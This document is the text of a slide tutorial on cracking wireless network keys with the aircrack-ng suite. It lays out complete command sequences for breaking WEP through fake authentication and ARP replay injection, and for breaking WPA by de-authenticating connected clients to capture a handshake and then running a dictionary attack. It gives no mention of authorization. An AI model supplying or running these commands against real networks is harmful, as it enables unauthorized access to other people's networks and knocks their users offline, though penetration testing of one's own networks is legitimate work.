Wireless Cracking By: Christopher Zacky aircrack-ng Suite http://www.aircrack-ng.org airodump-ng Capture packets airmon-ng Put your wireless card into monitor mode I just use iwconfig for this aireplay-ng Do fake authentications ARP replay requests De-authenticate other clients aircrack-ng To crack the key WEP and WPA WEP key... relatively easy to crack Don't use WEP, wtf is wrong with you ARP replay request WPA key... not as easy, but still possible especially if your password is lame You need to capture a handshake Can only be done with brute force, which is a dictionary-based attack What do you need? aircrack-ng It's free and open source Some linux distributions come with it installed (like backtrack, or pentoo) Wireless card Needs to be able to go into monitor mode (sometimes Windows has a problem with that) Needs to be capable of wireless injection Just because you are close enough to receive wireless packets, does not mean you are close enough to send them WEP Crack - Concepts http://www.aircrack-ng.org/doku.php? id=simple_wep_crack Uses tens of thousands of initialization vectors (IVs) The process is sped up through injection aircrack-ng runs an algorithm on the captured IVs to crack the key WEP Crack - Overview Find the essid, channel, and mac address of the access point using airodump-ng Put wireless card in monitor mode and begin listening on the correct channel Your will be recording packets into a file Do a fake authentication with the access point Put aireplay-ng ARP replay request mode Capture lots of packets I wait till I have 100,000 Run aircrack-ng and crack the key! airodump-ng airodump-ng <device_name> airodump-ng wlan0 Write down the essid, channel, and mac address Using screen helps a lot Also, use ifconfig and write down your wireless card's mac address... you'll need it later Monitor Mode Some people use airmon-ng... I don't You need to be on the right channel before you start capturing packets I use iwconfig Use airodump-ng to find the right channel Managed mode = regular mode Monitor mode = what we want to do WEP cracking iwconfig to change channel ifconfig to turn interface on/off Enabling Monitor Mode on the Right Channel ifconfig wlan0 down iwconfig wlan0 mode managed ifconfig wlan0 up iwconfig wlan0 channel 6 ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up The commands airodump-ng -c <channel> --bssid <network_name> w <file_name> <device_name> aireplay-ng -1 0 -e <essid> -a <bssid> -h <my_mac_address> <device_name> Do a fake authentication aireplay-ng -3 -b <bssid> -h <my_mac_address> <device_name> Start capturing packets Begin packet injection aircrack-ng <file_name> Crack the WEP key WPA Crack - Overview Can only be done via brute force You need to capture a handshake Wait for someone to connect Find someone who is connected and de-auth them Run the captured handshake against a dictionary You will only crack the key if it is in the dictionary you are using WPA crack airodump-ng -c <channel> --bssid <network_name> w <file_name> <device_name> aireplay-ng -0 1 -a <bssid> -c <client_mac_address> <device_name> Start capturing packets De-authenticate the client aircrack-ng -w <password_list> -b <bssid> <file_name> Crack the WPA key